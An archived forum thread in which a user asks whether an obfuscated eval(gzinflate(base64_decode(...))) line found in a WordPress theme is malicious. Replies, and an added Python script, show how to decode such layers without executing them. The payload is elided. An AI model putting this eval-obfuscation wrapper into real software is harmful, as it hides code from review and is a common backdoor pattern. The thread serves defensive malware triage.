OM2 Posted December 5, 2010

I have some PHP code that looks really dodgy.

I was given a WordPress theme to install for someone.

Don't know why, I just thought I would check a few of the files before I installed on my server.

I've always thought it would be easy to hijack a server by using malicious code.

Don't know if the code would make sense, but I thought I'd give a snippet:

    <? eval(gzinflate(base64_decode('... ... ...'))); ?>

The above is just a snippet of the beginning and end.

I won't be installing the theme on my server!

What is the code though?? What can it do? Is it likely to be malicious??

Thanks

OM

cigardude Posted December 6, 2010

Save everything after base64_decode(' into a text file. Rename the text file to .uue and open with WinZip. Should decode the text file for you.

Or make a new PHP page:

    <?php
    // Decode only: without eval() the payload is printed, not executed.
    $contents = gzinflate(base64_decode('HJzHrutIlkV/pWaVAAf0Dmh0gd57z0mD3ouiN1/fujXNvBCpiDh7ryXq6T//+z//+Vd1ZuM/zdt96jHbq3/ybKsI7P/KqpjL6p9/i.........'));
    echo $contents;

OM2 (Author) Posted December 6, 2010

Hmmm, OK - I can do.

So you think it might not be malicious code in that case?

Would such code actually execute and do 'something'?

The actual file was about 130kb - which is huge for a PHP file - I would assume that would be 10000 lines of code or something?

Let me know what you think.

Thanks

BlueSkyIS Posted December 6, 2010

The code is obfuscated for one or two reasons:

1. to slightly prevent modification of the code, and/or
2. it is malicious.

As long as you remove the eval() from around the code, it will not execute, just like cigardude said.

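The decode-without-eval approach from the two replies above, as an added example that is not part of the original posts: it unwraps the `eval(gzinflate(base64_decode('...')))` shape statically in Python, so no PHP interpreter touches the file, and keeps peeling while the decoded output is itself the same wrapper. The function names, the layer and size caps, and the sample payload are assumptions made for this illustration.

```python
import base64
import re
import zlib

# Matches the wrapper shown in the thread: eval(gzinflate(base64_decode('...')))
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1",
    re.IGNORECASE,
)
MAX_LAYERS = 20                # assumed cap on nesting depth
MAX_OUTPUT = 5 * 1024 * 1024   # assumed cap per layer, guards against deflate bombs


def inflate_raw(blob: bytes) -> bytes:
    """Equivalent of PHP gzinflate(): raw DEFLATE with no zlib or gzip header."""
    d = zlib.decompressobj(wbits=-15)
    out = d.decompress(blob, MAX_OUTPUT)
    if d.unconsumed_tail:
        raise ValueError("decoded layer exceeds MAX_OUTPUT")
    return out


def peel(php_source: str):
    """Return (decoded_source, layers_removed); nothing is ever executed."""
    layers = 0
    while layers < MAX_LAYERS:
        m = WRAPPER.search(php_source)
        if not m:
            break
        raw = base64.b64decode("".join(m.group(2).split()))
        php_source = inflate_raw(raw).decode("utf-8", errors="replace")
        layers += 1
    return php_source, layers


def wrap(php_code: str) -> str:
    """Build a constructed sample in the same shape as the theme file."""
    c = zlib.compressobj(wbits=-15)
    blob = c.compress(php_code.encode()) + c.flush()
    b64 = base64.b64encode(blob).decode()
    return "<? eval(gzinflate(base64_decode('%s'))); ?>" % b64


# Constructed, harmless sample: two nested layers around a plain echo.
SAMPLE = wrap(wrap("echo 'hello from the decoded layer';"))

if __name__ == "__main__":
    decoded, n = peel(SAMPLE)
    print(f"{n} layer(s) removed:\n{decoded}")
```

If the decoded text still looks encoded but `peel` stops early, the next layer uses a different function chain than the one in this thread and has to be handled separately.
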
OM2 (Author) Posted December 6, 2010

Thanks - that's great advice.

Archived
This topic is now archived and is closed to further replies.